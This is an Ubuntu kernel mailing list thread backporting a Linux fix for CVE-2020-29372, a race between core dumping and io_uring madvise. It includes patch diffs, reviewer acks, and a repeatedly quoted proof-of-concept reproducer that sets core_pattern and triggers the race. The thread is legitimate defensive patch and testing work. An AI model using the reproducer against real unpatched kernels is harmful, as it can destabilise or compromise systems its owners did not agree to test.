[SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()

Previous Topic Next Topic
 
classic Classic list List threaded Threaded
6 messages Options
Reply | Threaded
Open this post in threaded view
|

[SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()

William Breathitt Gray
SRU Justification
=================

[Impact]

An issue was discovered in do_madvise in mm/madvise.c in the Linux
kernel before 5.6.8. There is a race condition between coredump
operations and the IORING_OP_MADVISE implementation, aka
CID-bc0c4d1e176e.

[Testing]

Jann Horn from Google Security Research has provided a root-only KASAN
reproducer:
<https://packetstormsecurity.com/files/157622/Linux-5.6-IORING_OP_MADVISE-Race-Condition.html>.
You should also be able to hit the bug as a normal user, especially if
you use FUSE:

$ cat > coredump_helper.c
#include <unistd.h>
#include <stdlib.h>
#include <err.h>
#include <stdbool.h>

int main(void) {
  char buf[1024];
  size_t total = 0;
  bool slept = false;
  while (1) {
    int res = read(0, buf, sizeof(buf));
    if (res == -1) err(1, \"read\");
    if (res == 0) return 0;
    total += res;
    if (total > 1024*1024 && !slept) {
      sleep(2);
      slept = true;
    }
  }
}
$ gcc -o coredump_helper coredump_helper.c
$ cat > set_helper.sh
#!/bin/sh
echo \"|$(realpath ./coredump_helper)\" > /proc/sys/kernel/core_pattern
$ sudo ./set_helper.sh
$ cat > dumpme.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \\
  typeof(x) __res = (x);      \\
  if (__res == (typeof(x))-1) \\
    err(1, \"SYSCHK(\" #x \")\"); \\
  __res;                      \\
})


int main(void) {
  void *area = SYSCHK(mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE|PROT_EXEC,
                           MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  memset(area, 'O', 1024*1024*2);
  SYSCHK(madvise(area+0x1000, 256*0x1000, MADV_RANDOM));

  // initialize uring
  struct io_uring_params params = { };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/10, &params));
  unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                       MAP_SHARED, uring_fd,
                                       IORING_OFF_SQ_RING));
  unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                       MAP_SHARED, uring_fd,
                                       IORING_OFF_CQ_RING));
  struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
                                          MAP_SHARED, uring_fd,
                                          IORING_OFF_SQES));

  // prepare delayed madvise via uring
  struct timespec ts = { .tv_sec = 1 };
  sqes[0] = (struct io_uring_sqe) {
    .opcode = IORING_OP_TIMEOUT,
    .flags = IOSQE_IO_HARDLINK,
    .len = 1,
    .addr = (unsigned long)&ts
  };
  sqes[1] = (struct io_uring_sqe) {
    // no ioprio, buf_index, off
    .opcode = IORING_OP_MADVISE,
    .addr = (unsigned long)area+1024*4/**1024*/,
    .len = 1024*1024,
    .fadvise_advice = MADV_NORMAL
  };
  ((int*)(sq_ring + params.sq_off.array))[0] = 0;
  ((int*)(sq_ring + params.sq_off.array))[1] = 1;
  (*(int*)(sq_ring + params.sq_off.tail)) += 2;

  int submitted = SYSCHK(syscall(__NR_io_uring_enter, uring_fd,
                                 /*to_submit=*/2, /*min_complete=*/0,
                                 /*flags=*/0, /*sig=*/NULL, /*sigsz=*/0));
  printf(\"submitted %d\
\", submitted);

  *(volatile char *)0 = 42;
}
$ gcc -o dumpme dumpme.c
$ ./dumpme
submitted 2
Segmentation fault (core dumped)
$

[Regression Potential]

Regression potentional is low. Changes affect only the do_madvise()
function, and consist of a simple mitigation: verifying that the mm is
still okay via mmget_still_valid().

[Miscellaneous]

Fix is already present in Groovy and Hirsute.

Linus Torvalds (1):
  mm: check that mm is still valid in madvise()

 mm/madvise.c | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

--
2.27.0


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

[SRU][CVE-2020-29372][X][PATCH 1/1] mm: check that mm is still valid in madvise()

William Breathitt Gray
From: Linus Torvalds <[hidden email]>

IORING_OP_MADVISE can end up basically doing mprotect() on the VM of
another process, which means that it can race with our crazy core dump
handling which accesses the VM state without holding the mmap_sem
(because it incorrectly thinks that it is the final user).

This is clearly a core dumping problem, but we've never fixed it the
right way, and instead have the notion of "check that the mm is still
ok" using mmget_still_valid() after getting the mmap_sem for writing in
any situation where we're not the original VM thread.

See commit 04f5866e41fb ("coredump: fix race condition between
mmget_not_zero()/get_task_mm() and core dumping") for more background on
this whole mmget_still_valid() thing.  You might want to have a barf bag
handy when you do.

We're discussing just fixing this properly in the only remaining core
dumping routines.  But even if we do that, let's make do_madvise() do
the right thing, and then when we fix core dumping, we can remove all
these mmget_still_valid() checks.

Reported-and-tested-by: Jann Horn <[hidden email]>
Fixes: c1ca757bd6f4 ("io_uring: add IORING_OP_MADVISE")
Acked-by: Jens Axboe <[hidden email]>
Signed-off-by: Linus Torvalds <[hidden email]>

CVE-2020-29372

(backported from commit bc0c4d1e176eeb614dc8734fc3ace34292771f11)
[ vilhelmgray: include linux/sched.h instead of linux/sched/mm.h ]
Signed-off-by: William Breathitt Gray <[hidden email]>
---
 mm/madvise.c | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/mm/madvise.c b/mm/madvise.c
index f548c66154ee..cf2b217a647a 100644
--- a/mm/madvise.c
+++ b/mm/madvise.c
@@ -20,6 +20,7 @@
 #include <linux/backing-dev.h>
 #include <linux/swap.h>
 #include <linux/swapops.h>
+#include <linux/sched.h>
 
 /*
  * Any behaviour which results in changes to the vma->vm_flags needs to
@@ -491,6 +492,23 @@ SYSCALL_DEFINE3(madvise, unsigned long, start, size_t, len_in, int, behavior)
  write = madvise_need_mmap_write(behavior);
  if (write)
  down_write(&current->mm->mmap_sem);
+
+ /*
+ * We may have stolen the mm from another process
+ * that is undergoing core dumping.
+ *
+ * Right now that's io_ring, in the future it may
+ * be remote process management and not "current"
+ * at all.
+ *
+ * We need to fix core dumping to not do this,
+ * but for now we have the mmget_still_valid()
+ * model.
+ */
+ if (!mmget_still_valid(current->mm)) {
+ up_write(&current->mm->mmap_sem);
+ return -EINTR;
+ }
  else
  down_read(&current->mm->mmap_sem);
 
--
2.27.0


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

[SRU][CVE-2020-29372][F/B][PATCH 1/1] mm: check that mm is still valid in madvise()

William Breathitt Gray
In reply to this post by William Breathitt Gray
From: Linus Torvalds <[hidden email]>

IORING_OP_MADVISE can end up basically doing mprotect() on the VM of
another process, which means that it can race with our crazy core dump
handling which accesses the VM state without holding the mmap_sem
(because it incorrectly thinks that it is the final user).

This is clearly a core dumping problem, but we've never fixed it the
right way, and instead have the notion of "check that the mm is still
ok" using mmget_still_valid() after getting the mmap_sem for writing in
any situation where we're not the original VM thread.

See commit 04f5866e41fb ("coredump: fix race condition between
mmget_not_zero()/get_task_mm() and core dumping") for more background on
this whole mmget_still_valid() thing.  You might want to have a barf bag
handy when you do.

We're discussing just fixing this properly in the only remaining core
dumping routines.  But even if we do that, let's make do_madvise() do
the right thing, and then when we fix core dumping, we can remove all
these mmget_still_valid() checks.

Reported-and-tested-by: Jann Horn <[hidden email]>
Fixes: c1ca757bd6f4 ("io_uring: add IORING_OP_MADVISE")
Acked-by: Jens Axboe <[hidden email]>
Signed-off-by: Linus Torvalds <[hidden email]>

CVE-2020-29372

(cherry picked from commit bc0c4d1e176eeb614dc8734fc3ace34292771f11)
Signed-off-by: William Breathitt Gray <[hidden email]>
---
 mm/madvise.c | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/mm/madvise.c b/mm/madvise.c
index 576b753be428..1734a0c0fee0 100644
--- a/mm/madvise.c
+++ b/mm/madvise.c
@@ -24,6 +24,7 @@
 #include <linux/swapops.h>
 #include <linux/shmem_fs.h>
 #include <linux/mmu_notifier.h>
+#include <linux/sched/mm.h>
 
 #include <asm/tlb.h>
 
@@ -826,6 +827,23 @@ SYSCALL_DEFINE3(madvise, unsigned long, start, size_t, len_in, int, behavior)
  if (write) {
  if (down_write_killable(&current->mm->mmap_sem))
  return -EINTR;
+
+ /*
+ * We may have stolen the mm from another process
+ * that is undergoing core dumping.
+ *
+ * Right now that's io_ring, in the future it may
+ * be remote process management and not "current"
+ * at all.
+ *
+ * We need to fix core dumping to not do this,
+ * but for now we have the mmget_still_valid()
+ * model.
+ */
+ if (!mmget_still_valid(current->mm)) {
+ up_write(&current->mm->mmap_sem);
+ return -EINTR;
+ }
  } else {
  down_read(&current->mm->mmap_sem);
  }
--
2.27.0


--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

ACK: [SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()

Thadeu Lima de Souza Cascardo-3
In reply to this post by William Breathitt Gray
Acked-by: Thadeu Lima de Souza Cascardo <[hidden email]>

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

ACK: [SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()

Andrea Righi
In reply to this post by William Breathitt Gray
On Fri, Jan 08, 2021 at 03:41:24AM -0500, William Breathitt Gray wrote:

> SRU Justification
> =================
>
> [Impact]
>
> An issue was discovered in do_madvise in mm/madvise.c in the Linux
> kernel before 5.6.8. There is a race condition between coredump
> operations and the IORING_OP_MADVISE implementation, aka
> CID-bc0c4d1e176e.
>
> [Testing]
>
> Jann Horn from Google Security Research has provided a root-only KASAN
> reproducer:
> <https://packetstormsecurity.com/files/157622/Linux-5.6-IORING_OP_MADVISE-Race-Condition.html>.
> You should also be able to hit the bug as a normal user, especially if
> you use FUSE:
>
> $ cat > coredump_helper.c
> #include <unistd.h>
> #include <stdlib.h>
> #include <err.h>
> #include <stdbool.h>
>
> int main(void) {
>   char buf[1024];
>   size_t total = 0;
>   bool slept = false;
>   while (1) {
>     int res = read(0, buf, sizeof(buf));
>     if (res == -1) err(1, \"read\");
>     if (res == 0) return 0;
>     total += res;
>     if (total > 1024*1024 && !slept) {
>       sleep(2);
>       slept = true;
>     }
>   }
> }
> $ gcc -o coredump_helper coredump_helper.c
> $ cat > set_helper.sh
> #!/bin/sh
> echo \"|$(realpath ./coredump_helper)\" > /proc/sys/kernel/core_pattern
> $ sudo ./set_helper.sh
> $ cat > dumpme.c
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <string.h>
> #include <stdlib.h>
> #include <sys/syscall.h>
> #include <err.h>
> #include <unistd.h>
> #include <sys/mman.h>
> #include <linux/io_uring.h>
>
> #define SYSCHK(x) ({          \\
>   typeof(x) __res = (x);      \\
>   if (__res == (typeof(x))-1) \\
>     err(1, \"SYSCHK(\" #x \")\"); \\
>   __res;                      \\
> })
>
>
> int main(void) {
>   void *area = SYSCHK(mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE|PROT_EXEC,
>                            MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
>   memset(area, 'O', 1024*1024*2);
>   SYSCHK(madvise(area+0x1000, 256*0x1000, MADV_RANDOM));
>
>   // initialize uring
>   struct io_uring_params params = { };
>   int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/10, &params));
>   unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
>                                        MAP_SHARED, uring_fd,
>                                        IORING_OFF_SQ_RING));
>   unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
>                                        MAP_SHARED, uring_fd,
>                                        IORING_OFF_CQ_RING));
>   struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
>                                           MAP_SHARED, uring_fd,
>                                           IORING_OFF_SQES));
>
>   // prepare delayed madvise via uring
>   struct timespec ts = { .tv_sec = 1 };
>   sqes[0] = (struct io_uring_sqe) {
>     .opcode = IORING_OP_TIMEOUT,
>     .flags = IOSQE_IO_HARDLINK,
>     .len = 1,
>     .addr = (unsigned long)&ts
>   };
>   sqes[1] = (struct io_uring_sqe) {
>     // no ioprio, buf_index, off
>     .opcode = IORING_OP_MADVISE,
>     .addr = (unsigned long)area+1024*4/**1024*/,
>     .len = 1024*1024,
>     .fadvise_advice = MADV_NORMAL
>   };
>   ((int*)(sq_ring + params.sq_off.array))[0] = 0;
>   ((int*)(sq_ring + params.sq_off.array))[1] = 1;
>   (*(int*)(sq_ring + params.sq_off.tail)) += 2;
>
>   int submitted = SYSCHK(syscall(__NR_io_uring_enter, uring_fd,
>                                  /*to_submit=*/2, /*min_complete=*/0,
>                                  /*flags=*/0, /*sig=*/NULL, /*sigsz=*/0));
>   printf(\"submitted %d\
> \", submitted);
>
>   *(volatile char *)0 = 42;
> }
> $ gcc -o dumpme dumpme.c
> $ ./dumpme
> submitted 2
> Segmentation fault (core dumped)
> $
>
> [Regression Potential]
>
> Regression potentional is low. Changes affect only the do_madvise()
> function, and consist of a simple mitigation: verifying that the mm is
> still okay via mmget_still_valid().
>
> [Miscellaneous]
>
> Fix is already present in Groovy and Hirsute.

Makes sense to me.

Acked-by: Andrea Righi <[hidden email]>

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team
Reply | Threaded
Open this post in threaded view
|

APPLIED: [SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()

Kelsey Skunberg
In reply to this post by William Breathitt Gray
Applied to F/B/X master-next. thank you!

-Kelsey

On 2021-01-08 03:41:24 , William Breathitt Gray wrote:

> SRU Justification
> =================
>
> [Impact]
>
> An issue was discovered in do_madvise in mm/madvise.c in the Linux
> kernel before 5.6.8. There is a race condition between coredump
> operations and the IORING_OP_MADVISE implementation, aka
> CID-bc0c4d1e176e.
>
> [Testing]
>
> Jann Horn from Google Security Research has provided a root-only KASAN
> reproducer:
> <https://packetstormsecurity.com/files/157622/Linux-5.6-IORING_OP_MADVISE-Race-Condition.html>.
> You should also be able to hit the bug as a normal user, especially if
> you use FUSE:
>
> $ cat > coredump_helper.c
> #include <unistd.h>
> #include <stdlib.h>
> #include <err.h>
> #include <stdbool.h>
>
> int main(void) {
>   char buf[1024];
>   size_t total = 0;
>   bool slept = false;
>   while (1) {
>     int res = read(0, buf, sizeof(buf));
>     if (res == -1) err(1, \"read\");
>     if (res == 0) return 0;
>     total += res;
>     if (total > 1024*1024 && !slept) {
>       sleep(2);
>       slept = true;
>     }
>   }
> }
> $ gcc -o coredump_helper coredump_helper.c
> $ cat > set_helper.sh
> #!/bin/sh
> echo \"|$(realpath ./coredump_helper)\" > /proc/sys/kernel/core_pattern
> $ sudo ./set_helper.sh
> $ cat > dumpme.c
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <string.h>
> #include <stdlib.h>
> #include <sys/syscall.h>
> #include <err.h>
> #include <unistd.h>
> #include <sys/mman.h>
> #include <linux/io_uring.h>
>
> #define SYSCHK(x) ({          \\
>   typeof(x) __res = (x);      \\
>   if (__res == (typeof(x))-1) \\
>     err(1, \"SYSCHK(\" #x \")\"); \\
>   __res;                      \\
> })
>
>
> int main(void) {
>   void *area = SYSCHK(mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE|PROT_EXEC,
>                            MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
>   memset(area, 'O', 1024*1024*2);
>   SYSCHK(madvise(area+0x1000, 256*0x1000, MADV_RANDOM));
>
>   // initialize uring
>   struct io_uring_params params = { };
>   int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/10, &params));
>   unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
>                                        MAP_SHARED, uring_fd,
>                                        IORING_OFF_SQ_RING));
>   unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
>                                        MAP_SHARED, uring_fd,
>                                        IORING_OFF_CQ_RING));
>   struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
>                                           MAP_SHARED, uring_fd,
>                                           IORING_OFF_SQES));
>
>   // prepare delayed madvise via uring
>   struct timespec ts = { .tv_sec = 1 };
>   sqes[0] = (struct io_uring_sqe) {
>     .opcode = IORING_OP_TIMEOUT,
>     .flags = IOSQE_IO_HARDLINK,
>     .len = 1,
>     .addr = (unsigned long)&ts
>   };
>   sqes[1] = (struct io_uring_sqe) {
>     // no ioprio, buf_index, off
>     .opcode = IORING_OP_MADVISE,
>     .addr = (unsigned long)area+1024*4/**1024*/,
>     .len = 1024*1024,
>     .fadvise_advice = MADV_NORMAL
>   };
>   ((int*)(sq_ring + params.sq_off.array))[0] = 0;
>   ((int*)(sq_ring + params.sq_off.array))[1] = 1;
>   (*(int*)(sq_ring + params.sq_off.tail)) += 2;
>
>   int submitted = SYSCHK(syscall(__NR_io_uring_enter, uring_fd,
>                                  /*to_submit=*/2, /*min_complete=*/0,
>                                  /*flags=*/0, /*sig=*/NULL, /*sigsz=*/0));
>   printf(\"submitted %d\
> \", submitted);
>
>   *(volatile char *)0 = 42;
> }
> $ gcc -o dumpme dumpme.c
> $ ./dumpme
> submitted 2
> Segmentation fault (core dumped)
> $
>
> [Regression Potential]
>
> Regression potentional is low. Changes affect only the do_madvise()
> function, and consist of a simple mitigation: verifying that the mm is
> still okay via mmget_still_valid().
>
> [Miscellaneous]
>
> Fix is already present in Groovy and Hirsute.
>
> Linus Torvalds (1):
>   mm: check that mm is still valid in madvise()
>
>  mm/madvise.c | 18 ++++++++++++++++++
>  1 file changed, 18 insertions(+)
>
> --
> 2.27.0
>
>
> --
> kernel-team mailing list
> [hidden email]
> https://lists.ubuntu.com/mailman/listinfo/kernel-team

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team